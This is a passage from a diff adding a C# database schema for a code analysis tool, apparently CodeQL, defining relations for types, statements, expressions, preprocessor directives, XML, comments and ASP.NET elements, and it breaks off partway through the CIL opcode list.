+) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = 